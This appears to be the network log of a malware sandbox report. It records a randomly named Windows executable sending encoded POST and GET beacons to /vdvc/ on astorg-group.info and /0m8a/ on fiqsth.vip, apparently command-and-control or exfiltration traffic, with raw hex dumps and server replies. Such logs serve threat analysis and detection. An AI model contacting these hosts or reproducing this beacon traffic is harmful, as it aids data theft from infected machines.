                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 35 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 65 76 6f 6f 2e 77 65 62 73 69 74 65 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.25 (Debian) Server at www.evoo.website Port 80</address></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.6 | 50007 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:27:05.050431013 CET | 652 | OUT | POST /vdvc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.astorg-group.info
Origin: http://www.astorg-group.info
Referer: http://www.astorg-group.info/vdvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 46 38 66 61 4d 5a 69 54 77 76 6e 59 51 53 2f 61 7a 72 6c 46 4f 7a 70 50 67 71 31 73 5a 2b 4c 7a 43 67 63 46 2f 63 6c 4b 53 58 70 4c 37 4d 69 48 4f 36 51 32 77 63 32 4b 62 65 73 44 63 64 57 6c 39 64 4d 6c 69 75 4b 4b 52 50 64 71 58 4a 45 57 44 64 63 51 62 79 56 69 59 41 2b 42 44 4a 6c 4c 46 35 61 4f 6e 67 78 35 4a 4c 4c 69 72 65 64 75 2f 4f 30 54 51 48 41 33 6e 67 73 73 47 7a 2f 43 44 64 79 54 71 52 6c 35 35 45 4f 56 75 67 5a 68 70 41 79 6e 75 58 47 48 6a 44 67 58 41 69 63 4d 66 71 76 35 34 52 73 5a 78 69 42 50 71 6f 59 75 78 4b 6e 39 58 4f 33 6b 2f 69 6a 5a 43 6a 6c 49
Data Ascii: bdlD=0O14lEhnQB07F8faMZiTwvnYQS/azrlFOzpPgq1sZ+LzCgcF/clKSXpL7MiHO6Q2wc2KbesDcdWl9dMliuKKRPdqXJEWDdcQbyViYA+BDJlLF5aOngx5JLLiredu/O0TQHA3ngssGz/CDdyTqRl55EOVugZhpAynuXGHjDgXAicMfqv54RsZxiBPqoYuxKn9XO3k/ijZCjlI
Nov 18, 2024 16:27:05.856203079 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 18 Nov 2024 15:27:05 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.6 | 50008 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:27:07.600482941 CET | 676 | OUT | POST /vdvc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 233
Cache-Control: max-age=0
Connection: close
Host: www.astorg-group.info
Origin: http://www.astorg-group.info
Referer: http://www.astorg-group.info/vdvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 49 7a 7a 4d 68 73 46 77 35 4a 4b 52 58 70 4c 6a 63 69 43 54 4b 51 6f 77 63 36 34 62 61 6b 44 63 5a 32 6c 39 59 77 6c 6a 5a 2b 4c 52 66 64 53 4d 5a 46 77 64 74 63 51 62 79 56 69 59 41 36 37 44 4a 39 4c 45 4a 4b 4f 6d 43 5a 36 45 72 4c 6a 73 65 64 75 79 75 30 58 51 48 41 46 6e 68 41 47 47 78 33 43 44 59 57 54 72 44 4e 36 77 45 4f 54 68 41 59 71 34 51 62 39 6a 56 54 32 70 56 34 59 42 79 59 73 61 63 79 6a 6b 69 73 36 6a 79 68 4e 71 71 41 63 78 71 6e 58 56 4f 50 6b 74 31 76 2b 4e 58 41 72 57 49 6a 71 73 42 70 79 4b 6a 55 77 70 47 64 43 35 32 37 49 41 51 3d 3d
Data Ascii: bdlD=0O14lEhnQB07HcPaDe+Tn/nZcy/a9LlBOz1Pgrx8ZIzzMhsFw5JKRXpLjciCTKQowc64bakDcZ2l9YwljZ+LRfdSMZFwdtcQbyViYA67DJ9LEJKOmCZ6ErLjseduyu0XQHAFnhAGGx3CDYWTrDN6wEOThAYq4Qb9jVT2pV4YByYsacyjkis6jyhNqqAcxqnXVOPkt1v+NXArWIjqsBpyKjUwpGdC527IAQ==
Nov 18, 2024 16:27:08.412798882 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 18 Nov 2024 15:27:08 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.6 | 50009 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:27:10.146294117 CET | 1689 | OUT | POST /vdvc/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 1245
Cache-Control: max-age=0
Connection: close
Host: www.astorg-group.info
Origin: http://www.astorg-group.info
Referer: http://www.astorg-group.info/vdvc/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 30 4f 31 34 6c 45 68 6e 51 42 30 37 48 63 50 61 44 65 2b 54 6e 2f 6e 5a 63 79 2f 61 39 4c 6c 42 4f 7a 31 50 67 72 78 38 5a 4c 54 7a 4d 53 30 46 78 61 78 4b 51 58 70 4c 39 4d 69 44 54 4b 52 30 77 59 57 38 62 61 6f 54 63 66 36 6c 39 2b 6b 6c 79 63 53 4c 66 66 64 53 54 4a 46 6b 44 64 63 4a 62 30 31 63 59 41 71 37 44 4a 39 4c 45 50 4f 4f 79 67 78 36 43 72 4c 69 72 65 64 55 2f 4f 30 76 51 45 78 79 6e 68 30 38 47 41 58 43 43 34 47 54 70 32 35 36 2f 45 4f 52 6b 41 5a 71 34 51 47 6a 6a 56 66 74 70 56 6c 33 42 31 51 73 59 72 6a 6b 2f 6a 59 43 67 67 42 66 38 38 55 56 6f 73 76 2f 58 6f 7a 44 6d 6a 33 58 47 30 59 59 64 73 76 68 36 43 41 4e 50 46 38 2b 6e 44 74 51 37 45 6a 4e 51 48 64 54 43 78 70 41 47 4b 6c 48 63 4f 51 34 51 6c 51 6c 33 57 46 44 48 49 6f 42 33 57 6c 4c 74 61 36 53 33 34 73 4e 4a 6c 48 74 33 78 5a 6a 34 4c 45 41 50 6a 76 66 77 63 6e 52 35 63 6a 39 72 69 53 77 43 31 57 5a 4a 42 6d 61 37 48 44 51 36 50 35 48 4b 4a 48 51 43 47 49 41 67 36 6b 6a 59 74 64 52 47 52 36 59 6f 44 30 6c 31 [TRUNCATED]
Data Ascii: bdlD= [TRUNCATED]
Nov 18, 2024 16:27:10.955631971 CET | 608 | IN | HTTP/1.1 501 Unsupported method ('POST')
Server: nginx
Date: Mon, 18 Nov 2024 15:27:10 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Data Raw: 31 61 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 0a 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 48 54 4d 4c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 35 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 35 30 31 20 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 20 28 27 50 4f 53 54 27 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 55 6e 73 75 70 70 6f [TRUNCATED]
Data Ascii: 1ac<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <meta http-equiv="Content-Type" content="text/HTML; charset=iso-8859-15" /> <title>501 Unsupported method ('POST')</title> </head> <body> <h1>Unsupported method ('POST')</h1> <p>Server does not support this operation</p> </body></html> 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.6 | 50011 | 217.70.184.50 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:27:12.724095106 CET | 393 | OUT | GET /vdvc/?bdlD=5MdYmwdbGD0BDYmaOdq/odi9Xn3PsoNjMQAWnbwvceTCKyge8o8IPCpC1t6KQbJzoNOqWqsbTcqy0exGkczRfKoDXMQfKdBjdSZSECOlFudRAOmJhTFjNLDsmq1e7cQhZ206lWU=&92=DPyPNvf84fs0yXSp HTTP/1.1
Accept: */*
Accept-Language: en-US,en;q=0.9
Connection: close
Host: www.astorg-group.info
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Nov 18, 2024 16:27:13.519913912 CET | 1236 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 15:27:13 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Vary: Accept-Encoding
Content-Security-Policy: default-src 'self'; script-src 'nonce-77448e08b46b4a848da3ce88feca6b5a';
Vary: Accept-Language
Data Raw: 39 33 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 22 20 63 6f 6e 74 65 6e 74 3d 22 64 65 66 61 75 6c 74 2d 73 72 63 20 27 73 65 6c 66 27 3b 20 73 63 72 69 70 74 2d 73 72 63 20 27 6e 6f 6e 63 65 2d 37 37 34 34 38 65 30 38 62 34 36 62 34 61 38 34 38 64 61 33 63 65 38 38 66 65 63 61 36 62 35 61 27 3b 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 54 68 69 73 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 72 [TRUNCATED]
Data Ascii: 93a<!DOCTYPE html><html class="no-js" lang=en> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width"> <meta http-equiv="Content-Security-Policy" content="default-src 'self'; script-src 'nonce-77448e08b46b4a848da3ce88feca6b5a';"> <meta name="description" content="This domain name has been registered with Gandi.net. It is currently parked by the owner."> <title>astorg-group.info</title> <link rel="stylesheet" type="text/css" href="main-dbee9253.css"> <link rel="shortcut icon" href="favicon.ico" type="image/x-icon"/> <link rel="preload" as="font" href="fonts/Inter/Inter-Regular--latin.woff2" type="font/woff2" crossorigin/> <link rel="preload" as="font" href="fonts/Inter/Inter-SemiBold--latin.woff2" type="font/woff2" crossorigin/> </head> <body> <div class="ParkingPage_2023-root_2dpus "><main class="OldStatic_2023-root_1AGy1 Parking_2023-root_qhMQ2"><div><article
Nov 18, 2024 16:27:13.519984961 CET | 212 | IN | Data Raw: 63 6c 61 73 73 3d 22 50 61 72 6b 69 6e 67 5f 32 30 32 33 2d 63 6f 6e 74 65 6e 74 5f 31 72 41 38 37 22 3e 3c 68 31 20 63 6c 61 73 73 3d 22 4f 6c 64 53 74 61 74 69 63 5f 32 30 32 33 2d 74 69 74 6c 65 5f 31 33 63 65 4b 22 3e 54 68 69 73 20 64 6f 6d
Data Ascii: class="Parking_2023-content_1rA87"><h1 class="OldStatic_2023-title_13ceK">This domain name has been registered with Gandi.net</h1><div class="OldStatic_2023-text_37nqO Parking_2023-text_1JZys"><p><a href="https:/
Nov 18, 2024 16:27:13.519999027 CET | 1214 | IN | Data Raw: 2f 77 68 6f 69 73 2e 67 61 6e 64 69 2e 6e 65 74 2f 65 6e 2f 72 65 73 75 6c 74 73 3f 73 65 61 72 63 68 3d 61 73 74 6f 72 67 2d 67 72 6f 75 70 2e 69 6e 66 6f 22 3e 3c 73 74 72 6f 6e 67 3e 56 69 65 77 20 74 68 65 20 57 48 4f 49 53 20 72 65 73 75 6c
Data Ascii: /whois.gandi.net/en/results?search=astorg-group.info"><strong>View the WHOIS results of astorg-group.info</strong></a> to get the domains public registration information.</p></div><div class="Parking_2023-positionbox_2OgLh"><div class="Park


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
25 | 192.168.2.6 | 50012 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 16:27:18.693389893 CET | 631 | OUT | POST /0m8a/ HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Cache-Control: max-age=0
Connection: close
Host: www.fiqsth.vip
Origin: http://www.fiqsth.vip
Referer: http://www.fiqsth.vip/0m8a/
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
Data Raw: 62 64 6c 44 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 47 61 55 67 7a 4b 50 54 45 61 53 70 58 45 33 66 43 51 54 4a 78 68 62 67 31 46 6b 55 41 4c 4d 63 39 44 2f 34 4b 4b 74 7a 4c 76 71 6e 6d 35 5a 4e 55 50 35 38 61 6a 4e 4e 61 72 73 62 4b 36 51 42 2b 7a 6b 67 37 2f 31 70 76 34 7a 63 6b 2f 42 51 62 35 39 42 79 78 4e 50 79 37 51 63 66 33 70 76 4e 49 2f 54 5a 37 53 39 47 33 7a 51 47 49 54 45 33 4d 79 53 50 36 35 76 52 77 66 30 62 4b 38 62 35 56 66 48 2f 70 4a 2f 6c 74 61 49 6c 6f 4e 4b 58 5a 66 4e 59 68 73 37 75 49 39 31 6e 6b 30 59 33 4b 77 61 39 54 52 79 51 59 4a 48 6f 5a 6f 78 50 45 47 33 72 51 4a 67 58 52 76 47 61 4d 53 45
Data Ascii: bdlD=t1cnTZ5xaz4ZGaUgzKPTEaSpXE3fCQTJxhbg1FkUALMc9D/4KKtzLvqnm5ZNUP58ajNNarsbK6QB+zkg7/1pv4zck/BQb59ByxNPy7Qcf3pvNI/TZ7S9G3zQGITE3MySP65vRwf0bK8b5VfH/pJ/ltaIloNKXZfNYhs7uI91nk0Y3Kwa9TRyQYJHoZoxPEG3rQJgXRvGaMSE


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                26 | 192.168.2.6 | 50013 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Nov 18, 2024 16:27:21.234764099 CET | 655 | OUT | POST /0m8a/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 233
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.fiqsth.vip
                                                                                                                                Origin: http://www.fiqsth.vip
                                                                                                                                Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 6f 63 2b 69 50 34 4a 4c 74 7a 4d 76 71 6e 2b 4a 5a 45 51 50 35 4e 61 6a 78 46 61 70 49 62 4b 36 45 42 2b 7a 30 67 34 49 68 71 75 6f 7a 61 76 66 42 6f 55 5a 39 42 79 78 4e 50 79 37 45 69 66 78 42 76 4e 38 37 54 66 76 47 2b 59 6e 7a 54 50 6f 54 45 7a 4d 79 57 50 36 35 42 52 30 2f 65 62 4d 34 62 35 55 76 48 2b 34 4a 2b 71 74 61 4f 34 34 4d 6c 45 4a 69 68 5a 53 64 76 6b 59 70 57 2b 48 73 69 37 63 74 41 68 67 52 52 43 49 70 46 6f 62 77 44 50 6b 47 64 70 51 78 67 46 47 6a 68 56 34 33 6e 6b 35 53 45 42 73 6e 43 66 77 52 36 62 42 41 78 5a 79 45 72 61 67 3d 3d
                                                                                                                                Data Ascii: bdlD=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZoc+iP4JLtzMvqn+JZEQP5NajxFapIbK6EB+z0g4IhquozavfBoUZ9ByxNPy7EifxBvN87TfvG+YnzTPoTEzMyWP65BR0/ebM4b5UvH+4J+qtaO44MlEJihZSdvkYpW+Hsi7ctAhgRRCIpFobwDPkGdpQxgFGjhV43nk5SEBsnCfwR6bBAxZyErag==


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                27 | 192.168.2.6 | 50014 | 3.33.130.190 | 80 | 1468 | C:\Program Files (x86)\tMxaCSSWUBVbynUZtBpECWwQftgNmIQQPqlzJoDLYSlEdCuphNgxxwZnrC\vqiDHNHvZuv.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                Nov 18, 2024 16:27:23.786346912 CET | 1668 | OUT | POST /0m8a/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Content-Length: 1245
                                                                                                                                Cache-Control: max-age=0
                                                                                                                                Connection: close
                                                                                                                                Host: www.fiqsth.vip
                                                                                                                                Origin: http://www.fiqsth.vip
                                                                                                                                Referer: http://www.fiqsth.vip/0m8a/
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1726.0 Safari/537.36
                                                                                                                                Data Raw: 62 64 6c 44 3d 74 31 63 6e 54 5a 35 78 61 7a 34 5a 48 36 45 67 2b 4a 6e 54 43 36 53 71 4a 30 33 66 4c 77 54 4e 78 68 58 67 31 45 67 45 41 5a 67 63 2b 56 6e 34 54 6f 46 7a 4e 76 71 6e 67 35 5a 4a 51 50 35 51 61 6e 64 42 61 70 31 35 4b 34 38 42 34 56 34 67 35 38 4e 71 6b 6f 7a 61 67 2f 42 54 62 35 39 75 79 78 64 4c 79 37 55 69 66 78 42 76 4e 36 58 54 4a 4c 53 2b 61 6e 7a 51 47 49 54 51 33 4d 79 79 50 36 78 33 52 30 36 72 62 38 59 62 2b 30 2f 48 79 71 78 2b 6a 74 61 4d 37 34 4d 39 45 4a 75 2b 5a 53 42 6a 6b 62 31 77 2b 46 77 69 2b 4a 38 48 38 6b 67 48 5a 35 4e 6e 6f 71 34 59 49 52 43 64 6d 78 6b 45 47 45 2f 58 66 74 53 50 6e 65 58 48 44 4f 75 48 53 68 56 76 62 56 70 59 55 47 5a 58 61 31 4e 69 37 35 47 55 6e 4c 45 50 67 49 41 4f 46 68 30 47 61 55 61 67 69 35 51 45 34 48 48 2f 6b 6f 2b 49 41 44 46 39 41 5a 55 64 6d 50 4f 46 70 77 71 62 42 64 37 46 50 32 6a 56 31 50 6c 50 67 7a 78 72 50 4e 42 44 51 50 39 6d 4a 58 35 44 71 33 42 54 7a 2f 79 47 4d 71 7a 48 6c 6a 68 51 79 46 67 74 48 79 6e 34 53 4b 2f 43 70 [TRUNCATED]
                                                                                                                                Data Ascii: bdlD=t1cnTZ5xaz4ZH6Eg+JnTC6SqJ03fLwTNxhXg1EgEAZgc+Vn4ToFzNvqng5ZJQP5QandBap15K48B4V4g58Nqkozag/BTb59uyxdLy7UifxBvN6XTJLS+anzQGITQ3MyyP6x3R06rb8Yb+0/Hyqx+jtaM74M9EJu+ZSBjkb1w+Fwi+J8H8kgHZ5Nnoq4YIRCdmxkEGE/XftSPneXHDOuHShVvbVpYUGZXa1Ni75GUnLEPgIAOFh0GaUagi5QE4HH/ko+IADF9AZUdmPOFpwqbBd7FP2jV1PlPgzxrPNBDQP9mJX5Dq3BTz/yGMqzHljhQyFgtHyn4SK/Cp8uAuGiRDJU9XpPE14SA5DYm9kwR3nRtBK6xwBqT9kjCEJLEPi4ytmEpDc8DVZEYLfH6RjOVA938Pg0Oa+TyP43XJBwswnwmirmTABI2E5i+Z1O800sdiPwC98RStKUFJYg7CttZl1ez5dhfTv/WoMFe5DQC2Ugu/gLZ8qmve4XxN7kiJsmBdcWqtD3YVbq8sXU0rv9xWNM8JeIJM/Xs/YbG3f6J6xcLDr4Wtyd89YgkPzmco9CNPR0ye0lhup2wwU1jt5VzWC7teLTI6zfMkD78y3+sD8ZYLU6i2ap6DgE3y1qMyEEBRq7WLcly4QkE+CZc6PxXvWo6Y7pcjizKOA0wa5bk3MyAcDixijX8cHOSx6n59Or3YbCNkmV7TzAEY9YW2E5cvvM61UjpUiAfTFXBC/p6dPD+V30Zqb2THsgE2HAmQCWcX2G6zVyfVaYRbua47mm+SAuPpVvm/3OTS7c/WOsQsd/QkHk+ppDQEwznJayzPZ7RoC